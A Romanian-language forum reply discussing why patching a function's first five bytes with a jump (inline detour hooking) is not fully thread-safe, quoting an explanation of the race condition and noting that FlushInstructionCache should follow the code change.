  25. Da, dar solutia cum "copy & replace" nu este 100% thread safe. Ai 5 bytes: push ebp, mov ebp, esp, adica 2 instructiuni Daca un thread executa DOAR "push ebp" apoi tu pui "jmp"... Nu mai e ok. Ca si in link-ul de mai sus: "The problem with Detouring a function during live execution is that you can never be sure that at the moment you are patching in the Detour, another thread isn't in the middle of executing an instruction that overlaps the first five bytes of the function. (And you have to alter the code generation so that no instruction starting at offsets 1 through 4 of the function is ever the target of a jump.)" Bine, asta e paranoia si cred ca e destul de greu sa se intample, dar totusi e posibil. Nota: Am uitat (nu am vrut sa risc sa stric proiectul) sa dau FlushInstructionCache, ar cam trebui facut acest lucru dupa modificarea de cod.
×
×
  • Create New...